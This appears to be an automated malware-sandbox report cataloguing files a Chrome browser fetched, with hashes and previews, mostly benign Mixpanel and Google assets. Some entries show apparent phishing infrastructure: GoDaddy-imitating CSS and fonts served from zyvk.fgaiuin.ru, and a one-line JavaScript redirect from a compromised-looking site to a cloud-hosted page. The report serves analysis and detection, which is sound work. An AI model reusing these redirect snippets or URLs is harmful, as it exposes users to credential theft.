                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="5f3d7387-331d-4a2d-a8dd-907e534caa90",e._sentryDebugIdIdentifier="sentry-dbid-5f3d7387-331d-4a2d-a8dd-907e534caa90")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:downloaded
                                                                            Size (bytes):7390
                                                                            Entropy (8bit):4.02755241095864
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                            SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                            SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                            SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/klGIQ3dTgD1URPJXa8mcdnV4FEGbv8KXpXQGkBx78170
                                                                            Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):141
                                                                            Entropy (8bit):5.003794765658934
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:463024A60AE15527037A091F9AF166BE
                                                                            SHA1:2832FB351E0CC72151DF0A9263348C647BE75571
                                                                            SHA-256:95937757651C8140BA577A0BE8E20315DD4BFE276A4381C4C6BBCF9A98657C8D
                                                                            SHA-512:11EC20936056EECA101B770EF74A8FA62EF96F2E78E66F87B8A262593DD648BB07E3012DCB3C906C0F5AC40BDB2795AF9EF73C1B8558AC243D8E0E09A871B4EE
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://automotorespascualito.com/hpp/index.php
                                                                            Preview:<script type="text/javascript">window.location.href = "https://prudn87837498798487434.us-lax-1.linodeobjects.com/900pppejdedr.html"</script>.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:downloaded
                                                                            Size (bytes):270
                                                                            Entropy (8bit):4.840496990713235
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:40EB39126300B56BF66C20EE75B54093
                                                                            SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                            SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                            SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/mnEMzb8jUNnKVyAT3k5kL57E6Hgba7eIuvr3UyuGz2C3Jh6U06zE378147
                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):548
                                                                            Entropy (8bit):4.660801881684815
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                            SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                            SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                            SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:downloaded
                                                                            Size (bytes):826
                                                                            Entropy (8bit):5.187830597717824
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0CA45767CFB2D464CDED718E19F764DB
                                                                            SHA1:A776E3D979F921608E857E8CA4A225065C47E81E
                                                                            SHA-256:5D254E0BBB06F5FE4904C27E4F6DD315A5B69F5A9E27F501A91A0BC5B57733DA
                                                                            SHA-512:C7BB0B078166D173B51CA5C37CD769A708BED503D24A9EE916E5CAB4EF4B9C749978A03DEA1300F13105058E01885B150D4E5361E6A3EF0342E4964250D44B28
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://api.sprig.com/sdk/1/environments/9sZai6GO-WSS/config
                                                                            Preview:{"border":"#626266","pageUrlEvents":[{"id":1796783159,"matchType":"exactly","pattern":"https://mixpanel.com/project/2132741/app/boards#id=3679967"},{"id":1796783158,"matchType":"exactly","pattern":"https://mixpanel.com/project/3018488/view/3536632/app/boards#id=5128983"},{"id":1796783065,"matchType":"exactly","pattern":"https://mixpanel.com/project/2195193/view/139237/app/boards#id=4209117"},{"id":1796777572,"matchType":"exactly","pattern":"https://docs.mixpanel.com/docs/data-structure/advanced/ad-spend"}],"metricThresholds":[],"metricsReportingIntervalSeconds":60,"metricsReportingEnabled":false,"mobileMetricsReportingEnabled":false,"maxAttrNameLength":255,"maxAttrValueLength":255,"maxEmailLength":255,"maxEventLength":255,"maxUserIdLength":255,"showSurveyBrand":false,"dismissOnPageChange":false,"showStripes":false}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:downloaded
                                                                            Size (bytes):151
                                                                            Entropy (8bit):4.24399319118715
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:CCDE448D35C02681ACF6F9B577CF7B27
                                                                            SHA1:C815AF72ABC5E9F1EBAC2F186A479131F5E2A918
                                                                            SHA-256:0406EA2E602221F8FBF6C5B8AFFCA43117ADB2140C1648D9D8A7C4AC2A424186
                                                                            SHA-512:C563B88DB19913258FA907D43E93E832A332E2633AC753DC5A5C61F5F4AD6733301F115A38C81126AA7AA7296EA67C1C3329920687D34969C336447C0632C8CB
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mixpanel.com/api/app/gdpr
                                                                            Preview:{"status": "ok", "results": {"is_gdpr": false, "opt_status_tracking": "undecided", "opt_status_cookies": "undecided", "opt_status_email": "undecided"}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):644
                                                                            Entropy (8bit):4.6279651077789685
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:541B83C2195088043337E4353B6FD60D
                                                                            SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                            SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                            SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/wx4JzFCVEPK2a4BmjUySfrZrcstE1RfsssMSRW12127
                                                                            Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (346)
                                                                            Category:downloaded
                                                                            Size (bytes):2993
                                                                            Entropy (8bit):5.435911699499325
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:322F0CAA8D45CEE9BA4F9181A4CA6080
                                                                            SHA1:52E4B2932EF1AD5067B9EA902FD22C6657FE264E
                                                                            SHA-256:4D885D4D6A15FAF1BB827C018FE8C369EDDA8508978AE29E758FDD2E75D6D3D7
                                                                            SHA-512:DDBF121588AC012EA7FC9E34C31FA927725F2C4769214B11CBCB6B8E8801E945CC0CCB6571ACABE75F2C792EB09035CA0AE74FDC2B592AB3A727DA0E2B3A5019
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/d7da5d0bc348d0b28d1f/reports/global-util.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="93eee05f-effb-499d-9e0c-666f9aec9a6a",e._sentryDebugIdIdentifier="sentry-dbid-93eee05f-effb-499d-9e0c-666f9aec9a6a")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):35786
                                                                            Entropy (8bit):5.058073854893359
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                            SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                            SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                            SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/xyEzOlhUCiierszzc4ef28
                                                                            Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):43596
                                                                            Entropy (8bit):7.9952701440723475
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                            SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                            SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                            SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/GDSherpa-vf.woff2
                                                                            Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1550)
                                                                            Category:downloaded
                                                                            Size (bytes):237893
                                                                            Entropy (8bit):5.419697808253665
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:717E69BA17C2E3D184E6E1EC0FFD5369
                                                                            SHA1:F34BC85EF0A0595FE010C5F5F51FF75EB9D97682
                                                                            SHA-256:2BBB8203F1803A84FB33C7BE772989E4F0FE438A6A245FCA70917DA1691A3E02
                                                                            SHA-512:24DADF2E9E27B468778630443DF8CBDCEDAF28D285DA0E30D25DAE6282D97A80D5DF1DF6B71F6D3AFD494200185DB2C7E02545BFF6AD787ED826D3AF254C7211
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/f5b42c9f66955ff772a5/vendors-node_modules_xyflow_react_dist_esm_index_js-node_modules_lodash_flattenDeep_js-node_m-9bcc7b.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="63c3914e-4240-4f14-bbd0-91b25f2c945b",e._sentryDebugIdIdentifier="sentry-dbid-63c3914e-4240-4f14-bbd0-91b25f2c945b")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (12927)
                                                                            Category:downloaded
                                                                            Size (bytes):23653
                                                                            Entropy (8bit):5.231645954111788
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2B0D60D68B14C610F7D93A9C16CB7230
                                                                            SHA1:B9AB0A09CB3582ACEE7791F816A9F4631353C3B6
                                                                            SHA-256:F7A856BFFFFEAC6CDE5AE38B46DA9870ABC8C34A7B3373C44528517EFFEF8FA1
                                                                            SHA-512:E286EDD342F19A4E2F085DC10232BC38AC6686BAAFE7AC0852CAAB5FC9B0559289B8934F04CE653BCE3E635910D7B27F6B1DA4126F5AAB8B1ACFE386347748DB
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/c0f349f0313b5049b340/runtime.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},o=(new e.Error).stack.o&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[o]="8abec819-ed71-4930-b789-2cbf99efe1b1",e._sentryDebugIdIdentifier="sentry-dbid-8abec819-ed71-4930-b789-2cbf99efe1b1")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(()=>{"use strict".var e={}.var o={}.function _(n){v
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2794)
                                                                            Category:downloaded
                                                                            Size (bytes):346203
                                                                            Entropy (8bit):5.38330840020447
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:37B5D5D3E193F7B27E78EDE2A1E5EA06
                                                                            SHA1:B999E6ADA54836955BDD0D14E146A0D813E28420
                                                                            SHA-256:E394293E95D5B3A2A40D1B232526B0E42516126A7E47A1BB00B54015763DBD1F
                                                                            SHA-512:07669EE4F519A3C976AA5EC4B0745F004D7FA3D5ED5CDBC259A3E262727D08CBDE94659707B5ECFB1B4703E3A323E3E87A259ED76AD5E983C593B4207D3F0B5E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/58c8916cbf9f3deb44c2/routes.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="44f84dc6-09e0-432c-a459-7bdaa00c1f46",e._sentryDebugIdIdentifier="sentry-dbid-44f84dc6-09e0-432c-a459-7bdaa00c1f46")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (647)
                                                                            Category:downloaded
                                                                            Size (bytes):652
                                                                            Entropy (8bit):5.029717151221401
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:83B9B74839B2B05C6ACDBB04D5FCBCE4
                                                                            SHA1:B3255924D853653F0AAFAA84C1D75E0F980CC303
                                                                            SHA-256:6F47C0D83B3E445DCEDFCBA1AAF0255CE62A1D8AD4053640AE03797EBCD93A67
                                                                            SHA-512:39F58671F9B3CB101E72E4F789DA170A5E442E2B07CF397CE324565EDCCF8C31A18FC32865AD70DF8687968179E643202C633922C260B962487A04F99232FDA8
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp&oit=3&cp=14&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p",["http://mixpanel.com","mixpanel.com login","mixpanel.com pricing","mixpanel competitors","mixpanel company","mixpanel community","mixpanel company size","mixpanel company address","mixpanel com ceo","mixpanel com linkedin"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":false},"google:suggestrelevance":[852,750,601,600,555,554,553,552,551,550],"google:suggestsubtypes":[[44],[512,13],[512,13],[30,13],[30,13],[30,13],[30,13],[30,13],[30,13],[30,13]],"google:suggesttype":["NAVIGATION","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (372)
                                                                            Category:downloaded
                                                                            Size (bytes):11286
                                                                            Entropy (8bit):5.382021535949405
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B344DE6640A6EEB36482650B3B24E2F1
                                                                            SHA1:CEF54EDBA139448A103317C51EC3AB68DAE97FEA
                                                                            SHA-256:D12216CEA633B4E6DEBE30FD518B0356C7338418CAA8D22A6D41C736EA5ED3C5
                                                                            SHA-512:57BE95DD8C63B04A10464C1D7631598197C0F2F40E47A890D42B0F62E4C60C68931B27E88E76A308570679B306DF99D9B2D1C9842159B1F7CB03C99A3C30C0E0
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/62a6186a516545166328/iron_apps_boards_src_report-util_query_ts.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},r=(new e.Error).stack.r&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[r]="4b041594-804e-4f73-bedd-977c5bb18ea3",e._sentryDebugIdIdentifier="sentry-dbid-4b041594-804e-4f73-bedd-977c5bb18ea3")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):157
                                                                            Entropy (8bit):5.087618455053353
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:09FF6D4621AD692F06B9A88D595720DC
                                                                            SHA1:62C61EE49EE2B50BC026585C5A6EE80A857108E0
                                                                            SHA-256:6FCCD591721A8772F558AFA0FEED88919C64DD47517E9EE12410908B943AD736
                                                                            SHA-512:345C7E611590A9B205687313BD88D3465FACFBEA4D94498EDCFE160BB9D7C7AC9DA08FD6A507A9685702DA7262E746D7D37CC02D18F1E1CAEE0B281E04BFD07C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxRfi&oit=3&cp=37&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNTS16WPXLxRfi",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):139
                                                                            Entropy (8bit):4.807874632408623
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D32627D582D23FE4AB1A8DAD55056C98
                                                                            SHA1:68871D527D4ECC636BC67CDEFE379BEBB4CF2FCF
                                                                            SHA-256:903BC455C5354CD89F487B89D31537A1516535D816714BD23A433FEAF8B763AB
                                                                            SHA-512:2A572F101270CFABFC67EE2F80719A531D3F3D9E4F31B6B2724E5BD9BF7A6870D967F60F82551481864F3E1BFB934C290A4AA58EF395985312C2986F6BBF80AD
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQ&oit=3&cp=19&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQ",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):146
                                                                            Entropy (8bit):4.90640028042902
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:E43246D6725C7ED7782E324491CD1DC7
                                                                            SHA1:2C6A2203FC06D2980ACEF70D03CBE302F97F4A16
                                                                            SHA-256:7F17BD2181F424231FAE3688EB5C005119D36D90D3B6EF45AFD8B3F5BE2697A7
                                                                            SHA-512:70AB134986FFECD9C1C9E876071A2074031A214CBFD39B50FE752F3B2C5B2503254A7D3A0D3B386711D9FCDD6765CE992E11CBDE8EC9B0553C6B21084E7184E2
                                                                            Malicious:false
                                                                            Reputation:unknown
